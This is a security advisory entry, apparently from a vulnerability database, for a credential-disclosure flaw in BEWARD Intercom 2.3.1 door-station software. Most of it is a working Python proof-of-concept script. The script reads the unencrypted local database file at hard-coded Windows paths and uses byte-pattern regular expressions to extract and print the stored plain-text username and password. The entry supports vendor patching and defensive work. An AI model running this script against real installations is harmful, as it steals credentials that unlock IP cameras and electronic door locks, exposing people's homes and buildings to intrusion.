BEWARD Intercom 2.3.1 Credential Disclosure

2019.01.28
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python # -*- coding: utf8 -*- # # BEWARD Intercom 2.3.1 Credentials Disclosure # # # Vendor: Beward R&D Co., Ltd # Product web page: https://www.beward.net # Affected version: 2.3.1.34471 # 2.3.0 # 2.2.11 # 2.2.10.5 # 2.2.9 # 2.2.8.9 # 2.2.7.4 # # Note: For versions above 2.2.11: The application data directory, which # stores logs, settings and the call records archive, was moved to ProgramData\BEWARD. # # New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB # Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB # # Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time # Video, Two-Way Audio. The software is used for BEWARD IP video door stations # control. # # Desc: The application stores logs and sensitive information in an unencrypted # binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to # the current user session can successfully disclose plain-text credentials that # can be used to bypass authentication to the affected IP camera and door station # and bypass access control in place. # # Tested on: Microsoft Windows 10 Home (EN) # Microsoft Windows 7 SP1 (EN) # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5505 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php # # # ####################################################################### # Output: # -------- # C:\> python beward_creds.py # Username: admin # Password: S3cr3tP4$$w0rd # C:\> # ####################################################################### # # 28.11.2018 # import subprocess import mmap###### import re######## import os######## # # For versions bellow 2.2.11: # # cuser = subprocess.check_output("echo %username%", shell=True) # dbfile = ('C:\Users\\' + cuser.rstrip() + '\Ap' # 'pData\Local\Beward R&D Co., Ltd\BEW' # 'ARD Intercom\DB\BEWARD.INTERCOM.FDB' # ) # # # For versions 2.2.11 and above: # dbfile = 'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB' def mapfile(filename): file = open(filename, "r+") size = os.path.getsize(filename) return mmap.mmap(file.fileno(), size) data = mapfile(dbfile) m = re.search(r"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data) print "Username: " + m.group(1) m = re.search(r"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data) print "Password: " + m.group(1)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top